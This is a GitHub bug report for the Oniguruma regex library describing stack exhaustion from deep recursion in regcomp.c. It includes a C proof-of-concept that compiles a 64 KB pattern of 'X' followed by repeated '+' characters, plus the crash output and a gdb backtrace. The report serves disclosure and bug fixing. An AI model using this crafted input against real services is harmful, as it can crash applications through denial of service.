Skip to content

Stack Exhaustion Problem caused by some parsing functions in regcomp.c making recursive calls to themselves. #147

Closed
@RKX1209

Description

@RKX1209

If Oniguruma try to parse very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like optimize_nodes(), tree_min_len().

Here is a POC source code that simply executes onig_search() with very large regular expression "X+++++++++++++++++++++++++++++++ .... ".

/*
 * oniguruma_sbof.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "oniguruma.h"

extern int exec(OnigSyntaxType* syntax, char* apattern, char* astr)
{
  int r;
  unsigned char *start, *range, *end;
  regex_t* reg;
  OnigErrorInfo einfo;
  OnigRegion *region;
  UChar* pattern = (UChar* )apattern;
  UChar* str     = (UChar* )astr;

  r = onig_new(&reg, pattern, pattern + strlen((char* )pattern),
               ONIG_OPTION_DEFAULT, ONIG_ENCODING_ASCII, syntax, &einfo);
  if (r != ONIG_NORMAL) {
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\n", s);
    return -1;
  }

  region = onig_region_new();

  end   = str + strlen((char* )str);
  start = str;
  range = end;
  r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE);
  if (r >= 0) {
    int i;

    fprintf(stderr, "match at %d\n", r);
    for (i = 0; i < region->num_regs; i++) {
      fprintf(stderr, "%d: (%d-%d)\n", i, region->beg[i], region->end[i]);
    }
  }
  else if (r == ONIG_MISMATCH) {
    fprintf(stderr, "search fail\n");
  }
  else { /* error */
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r);
    fprintf(stderr, "ERROR: %s\n", s);
    onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
    onig_free(reg);
    return -1;
  }

  onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
  onig_free(reg);
  return 0;
}

#define REGEX_SZ 0x10000

extern int main(int argc, char* argv[])
{
  int r, i;

  OnigEncoding use_encs[] = { ONIG_ENCODING_ASCII };
  char regex[REGEX_SZ] = {0};  
  regex[0] = 'X';
  for (i = 1; i < REGEX_SZ; i++) regex[i] = '+';

  onig_initialize(use_encs, sizeof(use_encs)/sizeof(use_encs[0]));
  
  r = exec(ONIG_SYNTAX_RUBY, regex, "bgc");

  onig_end();
  return r;
}
gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
./oniguruma_stack
Segmentation fault (core dumped)
gdb -q ./oniguruma_syntax -c core
Reading symbols from ./oniguruma_stack...done.                                        
[New LWP 19257]                                                                       
Core was generated by `./oniguruma_stack'.                                            
Program terminated with signal SIGSEGV, Segmentation fault.                           
#0  0x00007fe64f65fde5 in tree_min_len (                                              
    node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
    env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
    at regcomp.c:2839                                                                 
2839    {                                                                             
(gdb) bt                    
#0  0x00007fe64f65fde5 in tree_min_len (                                              
    node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
    env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
    at regcomp.c:2839
#1  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
    at regcomp.c:2942
#2  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#3  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
    at regcomp.c:2942
#4  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
    at regcomp.c:2913
#5  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
    at regcomp.c:2942
#6  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#7  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
    at regcomp.c:2942
#8  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
    at regcomp.c:2913
#9  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
    at regcomp.c:2942
#10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
    at regcomp.c
....

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions